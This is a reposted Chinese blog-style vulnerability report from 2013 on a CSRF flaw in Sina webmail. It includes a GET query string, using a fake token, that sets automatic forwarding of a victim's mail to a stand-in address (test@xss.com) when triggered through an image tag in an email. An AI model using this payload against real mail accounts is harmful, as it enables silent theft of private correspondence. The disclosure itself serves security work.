当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

新浪一处搞笑的CSRF,可以窃取用户邮件

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

这几天,把SINA/SOHU/163通通CSRF了一遍。。国内普通不重视CSRF啊。

为什么说这个搞笑呢? 因为形式上,这个链接是做了CSRF防范的,可事实上。。。

  涛涛电脑知识技巧

可以修改用户邮箱设置,而且可以使用GET方式。所以,攻击者可以直接<IMG SRC=xxx>发封邮件给对方,对方只要一看到这封邮件即刻中标。

我的demo中是把用户邮件全转到一个指定邮箱。。。当然,还可以干别的设置。所以,这个算相当高危的吧。。。

话说,你们那TOKEN......和尚头上的虱子啊.....

 

?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&forwordemail=test@xss.com&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  


 

修复方案:

token啊token

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1